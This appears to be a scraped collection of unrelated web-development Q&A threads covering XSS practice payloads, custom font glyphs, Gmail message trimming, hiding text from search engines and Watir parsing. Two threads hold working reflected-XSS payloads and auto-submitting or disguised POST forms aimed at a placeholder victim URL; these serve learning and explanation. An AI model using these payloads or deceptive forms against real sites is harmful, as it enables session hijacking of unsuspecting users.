I recently started to teach myself XSS vulnerability and stumbled this website for practice.
https://sudo.co.il/xss/level2.php
But after several attempts to enter several payloads
Example: <script>alert('XSS')</script>
I can't get XSS to work.
The value is reflected in the input value attribute. You can escape this by starting with a " and then add other attributes. For example: " onmouseover="alert('XSS')".
To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" or there may be better attributes to use instead.
You can escape this by starting with a "
For example:"><img/src=x onerror=alert(origin)>
Related
This character doesn't exist in Unicode since I created it myself. Now, it is in an esp file format. After some searches, and my understanding, I can't just put it into Unicode.
My goal is to display it, let my viewers to see if they like it, but not in any picture format since it also serves other purposes for the website, where displaying it as an image is just not considered.
How can we display a self-created character where it could ONLY be displayed as a regular letter?
Yes we can, but we should be really careful doing so.
As Remy Lebau suggested, if you really insist on using custom glyph as "regular letter" inside text flow, you should
create a real font file to be placed on web (WOFF/OTF), or installed on each user device (OTF/TTF),
ensure that custom glyph in your font file is assigned to some code point from the "private-use" area,
use the code point in unicode-range value of #font-face,
and add newly created font-family to the font stack.
Example:
#font-face {
font-family: f;
src: local(Impact), local(Haettenschweiler), local(Helvetica Inserat);
unicode-range: U+65;
}
#font-face {
font-family: f;
src: local(Courier new), local(Menlo), local(Liberation Mono);
unicode-range: U+6f;
}
body { font-family: f, sans-serif; }
<p>Some text where letters "o" and "e" are from a different ("custom") font-faces.</p>
Font-face with only private-use characters should work even as a last (fallback) in the stack, but it does not matter here. In your case those "local()" declarations would be replaced with url() path or dataURI. If your target audience is in controlled environment (intranet) and you can reliably distribute the to all consuming devices, you can use even the local([name of locally installed ustom font])
The unicode-range value would be something like U+F8FF.
But, use this in and only if you are sure your users will
Why you probably should not do that this way
If there is chance (some of) your users have not installed, does not support, can not download or are blocking given font, or is using assistive technology to consume your content and given glyph conveys some meaningful information, you probably should refrain from using the approach described above.
If you don't have such controlled audience and want to support screen readers, and still don't want to use simple <img alt="[glyph meaning in the context]">, you should at least wrap their occurrences as suggested in Léonie Watson's article Accessible emoji:
Some text <span role="img" aria-label="[glyph meaning in the context]"></span>
Gmail introduced a trimming feature in emails for "better readability". This causes a lot of pain for me, as I have a notification system for email, where I send some html email messages to users. Basically email looks like this:
divs and styling
Object alert in Project by User
tables and tr/td
User Action on Object in Project
/tables and tr/td
/divs and styling
link
footer
To group all emails in one conversation, first email has subject, subsequent emails have Re: subject.
Active users can receive significant amounts of emails like this, but due to "better readability" feature, ALL of the email content (starting from second email) is suppressed.
I am looking for advice - maybe I should redesign my html, or gmail has some anti-suppression code, or just a hack to go around this issue.
Issue from users perspective is described here: http://www.google.com/support/forum/p/gmail/thread?tid=756b83fa60ca1df7&hl=en
I had the trimming problem occurring on a table of an HTML newsletter.
It was very important that the entire table display because it was the
#1 content our client wanted to communicate. Here's the fix, or at least here's how we solved our problem. We eliminated any repetition.
So for this table, the lines in between each row, Gmail was seeing the
lines as repetitive. So I altered the pixel width by 1 px every other
line, which eliminated the repetition and fixed our problem. So that
said, look for repetition, and try to remove it. OR in some cases, you
might have to add type (in white) to create the variation.
Source.
PS: This is a bit unrelated, but I stumbled upon this question while looking for a way to disable the content trimming and keep the conversation view at the same time. I didn't find anything, so I developed a small extension for Chrome and Firefox.
It turns out that there is a very simple rule which causes this behaviour: Gmail will clip the email as soon as it sees the sender (From:) name in the body of the message, regardless of where this appears.
Solution: make sure that that the From: name in your email is not used in the message body (except in the signature, which will probably get clipped!).
This is an awful bug in Gmail, if you're unlucky enough to get bitten by it.
In my case, it was "trimming" an entire message, in a clean thread. See an example here, noting that the "trimmed" content is expanded in the screen-shot.
I ultimately worked around Gmail's bug by removing the entire header you see in that example ("Awesome Home Swap"), including the border below it. I stopped short of actually trying to figure out what specifically was making Gmail confuse that header as a "signature" (though I suspect it could have been the border, implemented using CSS directive border-bottom:1px dotted grey to style the <td> element).
I just found a solution that worked wonderfully for me. Simply create a bunch of hidden unique images throughout your emails to provide uniqueness to parts of the email that aren't actually unique. I'm building my emails with React so I have this Unique components that I'm using pretty much everywhere:
import * as React from "react"
function random() {
return Math.round(Math.random() * 10000000).toString()
}
class Unique extends React.PureComponent {
render() {
return (
<img style={Unique.style} src={`data:image/png;base64,${random()}`} />
)
}
static style = {
visibility: "hidden",
display: "none",
width: 0,
height: 0,
color: "transparent",
background: "transparent",
}
}
One thing I like about this solution is that it doesn't mess up the email preview text that would otherwise happen if you're using hidden text.
Add a double hyphen -- before the collapsed part. I was able to wrap it in a with font color matching the background. Worked for me...
I looked at the emails Gmail sent. Adds the following code (spacer.gif).
I guess this is the solution.
<img alt="" height="1" width="3" src="https://notifications.google.com/g/img/AD-FnEztup4OClDshQhMVXDbi6Oi0lSN-FgEY1jyW384aotccA.gif">
</td>
</tr>
</table>
</body>
</html>
In my WordPress blog, I have "Posted ? days ago" on every post. I have 10 posts on my homepage. So according to most keyword analysis tools, "days ago" is a top keyword on my blog, but I don't want it to be. How can I hide those words from search engines?
I don't want to use Javascript. I can easily use PHP and the $_SERVER variable, but I'm afraid I might get penalized for cloaking. Is there a HTML tag or an attribute like rel="nofollow" that I can use?
From Is there any way to have search engines not index a certain section of a page?
Supposedly you can add the class
robots-nocontent to elements on your
page, like this:
<div class="robots-nocontent">
<p>Ignore this stuff.</p>
</div>
Yahoo respects this, though I
don't know if other search engines
respect this. It appears Google is
not supporting this at this time.
I suspect if you load your content via
ajax you would get the same effect of
it not being present on the page.
and
There's no general way to do that and
personally I wouldn't bother with it.
Search engines are pretty good at
recognizing relevant content on a
page, and even though that content
might show up in the keywords that
search engines have found, it doesn't
mean that it would make the page
relevant for those keywords.
If you have a page about "Fish" and a
page about "Dogs" (that has the link
to the page about "Fish" somewhere in
the sidebar), search engines will
generally be able to recognize that
the page about "Fish" is much more
relevant for "Fish" than the page
about "Dogs" that mentions "Fish" in
the sidebar. It's possible that both
pages might be found at some point,
but generally given that mostly one
page from the site is shown in the
search results, that's not something
worth worrying about.
There's no need to be fancy with that,
and search engines are likely to just
get more confused if you try (eg if
you use JavaScript to hide the
content, you never know when search
engines will start to find that
content regardless). Similarly, using
iframes with robots.txt disallows or
AJAX will frequently degrade the
quality of your pages to users (slow
it down or make it less usable on a
variety of devices), so unless there
is a very, very strong & proven reason
that you need to do this, I would
strongly recommend not bothering with
it.
What I have found on wiki:
For Yandex:
<!--noindex-->Don't index this text.<!--/noindex-->
For Yahoo:
<div class="robots-nocontent">Don't index this text.</div>
For Google:
<!--googleoff: index--> Don't index this text.<!--googleon: index-->
Linksku, I'm fairly sure you shouldn't be worried about that particular piece of text. Our algorithms do a relatively good job detecting boilerplate text. As far as I can tell from your question, this text is boilerplate and we likely already know that.
As for detecting Googlebot and don't serving this text for it, you're right, that would be cloaking and you should never do it. In this case if you hide that text from us, we will also have a hard time detecting it's boilerplate and you would end up doing exactly what you're trying to avoid :)
I worked this out and posted it up at: http://www.scivillage.com/thread-2580.html
This should work, however more testing of it and feedback would be appreciated.
.x:before{
content:attr(title);
display:inline;
}
<ul>
<li><span class="x" title="Homepage"></span></li>
<li><span class="x" title="Contact" /></li>
</ul>
(I kept the class name short to reduce mark-up creep)
The search engines should ignore HTML tags with empty values when comes to looking for keywords, this should mean that it ignores what is written in the title attribute. (It assumes that the value is what's important, if it's empty then there is no point checking the attributes)
It was suggested that it's possible to negate having the closing tag in HTML5 due reduced strictness, however there is counter suggestions that end tags are still required.
I'd suggest not using it directly on a (anchor) tags since they can be used for sitemaps (using #), so it's means they would like have the Title spidered.
Although it is possible that it might assume any title content is there to inflate keywords through hidden elements, however I can not confirm this.
To exclude specific text from Google search results you can add data-nosnippet attribute.
https://developers.google.com/search/reference/robots_meta_tag#data-nosnippet-attr
From google documentation
You can also prevent certain parts of the page text content from being shown in a snippet by using data-nosnippet.
HTML:
<div class="hasHiddenText">_</div>
It is important that you leave a non-whitespace character between the element with a hidden text.
External CSS:
.hasHiddenText{
content: "Your hidden text here...";
/*This ovewrites the default content of the div but it isn't supported by all browsers.*/
}
.hasHiddenText::before{
content: " Your hidden text here...";
/*Places a hidden text above the div.*/
}
The "hidden text" pertains to content hidden to all search engines but visible to visitors.
You can also use nextline and all sorts of Unicode characters by escaping them with \uXXXX. To display linebreak characters correctly, be sure to add the
white-space:pre-line;
property.
Examine this example. It is in PHP, but you should be able to pick up what is happening if you don't know PHP.
echo 'You searched for "' . $_GET['q'] . '"';
Now, obviously, this is a bad idea, if I request...
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
OK, now I change that GET to a POST...
echo 'You searched for "' . $_POST['q'] . '"';
Now the query string in the URL won't work.
I know I can't use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.
One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.
So, what are the ways of exploiting the second example (using POST)?
Thanks
Here is an xss exploit for your vulnerable code. As you have aluded to, this is an identical attack pattern to POST based CSRF. In this case i am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit type in the form. The post request will immediately execute and the page will redirect, it is best to run post based csrf of exploits in an invisible iframe.
<html>
<form id=1 method="post" action="http://victim/vuln.php">
<input type=hidden name="q" value="<script>alert(/xss/)</script>">
<input type="submit">
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>
I also recommended reading about the sammy worm and feel free to ask any questions about other exploits I have written.
All I would need to do to exploit this is to get a user to click a form that sends a tainted "q" post variable. If I were being all nasty-like, I wouldcraft a form button that looks like a link (or even a link that gets written into a form POST with Javascript, sort of like how Rails does its link_to_remote stuff pre-3.0).
Imagine something like this:
<form id="nastyform" method="post" action="http://yoururl.com/search.php">
<input type="submit" value="Click here for free kittens!">
<input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
</form>
<style>
#nastyform input {
border: 0;
background: #fff;
color: #00f;
padding: 0;
margin: 0;
cursor: pointer;
text-decoration: underline;
}
</style>
If I can get a user to click that (thinking that he's clicking some innocent link), then I can post arbitrary data to the search that then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.
Post data isn't inherently more secure than get data; it's still user input and absolutely cannot be trusted.
CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user; this has the same sort of entry vector, but it's a classic XSS attack, designed to result in the injection of malicious Javascript into the page for the purpose of gaining session access or something similarly damaging.
Given the following HTML code (which, I realise, sucks, but that's not something I can currently solve):
<img height="64" width="64" class='list_item' src="/img/icon/first.jpg"
title="This is the first item::Completed the item "I did this first"" alt="First" />
gives me a result of (this is an image.to_s)
name:
type:
id:
value:
disabled:
src: /img/icon/first.jpg
width: 64
height: 64
alt: First
Note lack of "title" element. This does not actually change (the lack of the title element)
If I get the contents of the parent div of one of those icons, I get something like:
<img class="list_item" I="" did="" this="" first="" src="/img/icon/first.jpg" alt="First">
The broken HTML of the original has been turned into separate attributes somewhere down the line, but the title tag appears to have been stripped completely, and since it's the contents of the title tag I need, I'm a little stuck.
This has been tried with lastest Watir on Ruby 1.9.2 using Firefox.
Perfect world solution: I'd like to get the original transmitted HTML for the image tag, so I can "special case" (ie, hack) around the stupid double-quote problem.
Good Enough Solution: the contents of the title tag.
There is actually a #title method on Watir::Image. With the above incorrect HTML the output would be like this (where 'i' is the Image object):
i.title
=> "This is the first item::Completed the item "
This shows only part of the title.
But you could use #html and then parse all the necessary information out of it with some magic:
i.html
=> "<IMG class=list_item title=\"This is the first item::Completed the item \" alt=First src=\"/img/icon/first.jpg\" width=64 height=64 first?? this did I>"
But as other answers above have mentioned - you cannot get it out correctly due to the bad HTML. Maybe there's some other way to accomplish your bigger goal you're having?
getting the title probably isn't working because the way the title attribute is set on that element isn't valid. entities " and < and > need to be escaped inside html attributes, with " and < and > respectively. Escape the quotes and try again.
Not sure, but I don't think Watir supports image titles. I looked over the Supported Elements page, title was x'ed out. I don't see it in the RDoc for Watir::Image type either.